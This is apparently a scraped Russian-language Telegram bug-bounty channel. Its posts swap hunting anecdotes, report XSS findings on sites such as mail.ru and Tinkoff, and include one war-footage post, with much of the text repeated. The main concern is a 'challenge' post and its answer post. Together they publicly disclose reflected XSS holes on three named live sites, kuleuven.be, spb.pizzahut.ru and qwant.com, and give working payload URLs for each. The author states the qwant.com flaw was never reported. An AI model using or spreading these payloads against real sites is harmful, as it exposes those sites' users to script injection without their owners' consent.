Няша доехала.
Решил взять холодный кошелек, чтобы смотивировать себя похантить на https://immunefi.com/explore/ по вебу. Ну и с прицелом стать мамкиным криптоанархистом.
#bb
Решил взять холодный кошелек, чтобы смотивировать себя похантить на https://immunefi.com/explore/ по вебу. Ну и с прицелом стать мамкиным криптоанархистом.
#bb
👍3
https://2ch.hk/b/arch/2017-01-20/res/144869013.html
Предлагаю вашему вниманию немного лулзов.
Я тогда только-только встпупил на дорожку багхантигна, и под впечатлением от парочки находок(cлепая XSS в форме восстановления паролей на mail.ru, которая позволяля в теории, узнать пароль от любого аккауна, и reflected XSS на developrs.google.com, об этих находках напишу позже отдельным постом) ришил запилить для анончиков гайд, как вкатиться в этот самый багхантинг.
Тред вышел вышел веселый, по ходу обсуждения были лулзы, взаимный троллинг разной тослстоты, обвинения в некомпетентности, подъехали ребята из всякиех там positive technologies, адепты кробы, и даже, уверен, сам @i_bo0om засветился.
В общем, все как мы любим, да.
И что самое ценное, я познакомился с некоторыми компетентными ребатами, с которыми общаюсь до сих пор. Которые пиздец, какие умные.
Такие дела.
Веселого чтения.
#bb
Предлагаю вашему вниманию немного лулзов.
Я тогда только-только встпупил на дорожку багхантигна, и под впечатлением от парочки находок(cлепая XSS в форме восстановления паролей на mail.ru, которая позволяля в теории, узнать пароль от любого аккауна, и reflected XSS на developrs.google.com, об этих находках напишу позже отдельным постом) ришил запилить для анончиков гайд, как вкатиться в этот самый багхантинг.
Тред вышел вышел веселый, по ходу обсуждения были лулзы, взаимный троллинг разной тослстоты, обвинения в некомпетентности, подъехали ребята из всякиех там positive technologies, адепты кробы, и даже, уверен, сам @i_bo0om засветился.
В общем, все как мы любим, да.
И что самое ценное, я познакомился с некоторыми компетентными ребатами, с которыми общаюсь до сих пор. Которые пиздец, какие умные.
Такие дела.
Веселого чтения.
#bb
Двач
//Б/ред/ - Багхантинга/пентеста/информационной безопасности
❤2
После парочки недавно зарепорченных багов в g/vrp, подъехал грант. Приятно. С интересующим их скоупом.
Наглядный пример, почему стоит хотя бы изредка, но хантить в корпорации зла. Можно по быстрому срубить на пиво.
#bb
Наглядный пример, почему стоит хотя бы изредка, но хантить в корпорации зла. Можно по быстрому срубить на пиво.
#bb
🔥4🌭1
🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
У меня тут раритет.
Такое просто так не нагуглишь.
Спецназ в Афганистане.
Забытая война, никому ненужная, как и те парни.
#combatfootge
Такое просто так не нагуглишь.
Спецназ в Афганистане.
Забытая война, никому ненужная, как и те парни.
#combatfootge
👏1
Отловил stored XSS на https://business.tinkoff.ru, например.
Зарепортил.
Надеюсь, что какой-то ловкий хакер не обогнал на повороте скромного скрипткидисса.
#bb
Зарепортил.
Надеюсь, что какой-то ловкий хакер не обогнал на повороте скромного скрипткидисса.
#bb
👍3🔥1
Сегодня, по странному стечению обстоятельств, день XSS.
Мой дружаня закидал меня вопросами по XSS, поэтому предлагаю вам челлендж в боевых условиях. От легкого к сложному.
1. https://www.kuleuven.be/communicatie/php/toga/?lang= Параметр lang уязвим.
2. https://spb.pizzahut.ru/?coupon[]= Параметр coupon[] уязвим.
3. https://www.qwant.com/?r=FR&sr=fr&l=fr_ Параметр l уязвим.
Тот кто первый решит, получит от менянихуя, коуб с Паймон.
#bb
Мой дружаня закидал меня вопросами по XSS, поэтому предлагаю вам челлендж в боевых условиях. От легкого к сложному.
1. https://www.kuleuven.be/communicatie/php/toga/?lang= Параметр lang уязвим.
2. https://spb.pizzahut.ru/?coupon[]= Параметр coupon[] уязвим.
3. https://www.qwant.com/?r=FR&sr=fr&l=fr_ Параметр l уязвим.
Тот кто первый решит, получит от меня
#bb
🔥5👍1
Оглядываясь назад, решил вспомнить, с чего же я начинал.
Пролистав историю репортов в самое начало - вздохнул с облегчением. Как и любой порядочный скрипткид я вступил на кривую дорожку багхантинга с Duplicate, а потом и закономерными N/A.
Забавно, что это был ок.ru - я на нем никогда не сидел(честно), но ручки почему-то потянулись тестить туда.
Но, кажется уже тогда понимал, что self XSS это хуйня(Вот что Античат с людьми делает).
Но интерес зарепортить первый баг перевесил сомнения в целесообразности.
Такие дела.
#bb
Пролистав историю репортов в самое начало - вздохнул с облегчением. Как и любой порядочный скрипткид я вступил на кривую дорожку багхантинга с Duplicate, а потом и закономерными N/A.
Забавно, что это был ок.ru - я на нем никогда не сидел(честно), но ручки почему-то потянулись тестить туда.
Но, кажется уже тогда понимал, что self XSS это хуйня(Вот что Античат с людьми делает).
Но интерес зарепортить первый баг перевесил сомнения в целесообразности.
Такие дела.
#bb
🌭2
ScriptKiddieNotes
Сегодня, по странному стечению обстоятельств, день XSS. Мой дружаня закидал меня вопросами по XSS, поэтому предлагаю вам челлендж в боевых условиях. От легкого к сложному. 1. https://www.kuleuven.be/communicatie/php/toga/?lang= Параметр lang уязвим. 2. …
This media is not supported in your browser
VIEW IN TELEGRAM
Ну поскольку всем похуй, вот такие ответы, в моем понимании, на предыдущий пост.
1. https://www.kuleuven.be/communicatie/php/toga/?lang=1</Script/><Svg/OnLoad=(confirm)(document.domain)>
2. https://spb.pizzahut.ru/?coupon[]='-alert(1)-'
3. https://www.qwant.com/?r=FR&sr=fr&l=fr_</script><script>myObj.prop =''-alert(document.domain);var myObj='';</script>
Hint:
Домен qwant.com вроде есть на yeswehack до сих пор, так что можете срубить за XSS баксов 500$. Лично я попытался там вывести денюжки по другим репортам, но уткнулся в сложности. Поэтому даже репортить не стал.
Ну и пусть нахуй идут.
#bb
1. https://www.kuleuven.be/communicatie/php/toga/?lang=1</Script/><Svg/OnLoad=(confirm)(document.domain)>
2. https://spb.pizzahut.ru/?coupon[]='-alert(1)-'
3. https://www.qwant.com/?r=FR&sr=fr&l=fr_</script><script>myObj.prop =''-alert(document.domain);var myObj='';</script>
Hint:
Домен qwant.com вроде есть на yeswehack до сих пор, так что можете срубить за XSS баксов 500$. Лично я попытался там вывести денюжки по другим репортам, но уткнулся в сложности. Поэтому даже репортить не стал.
Ну и пусть нахуй идут.
#bb
😁5👍1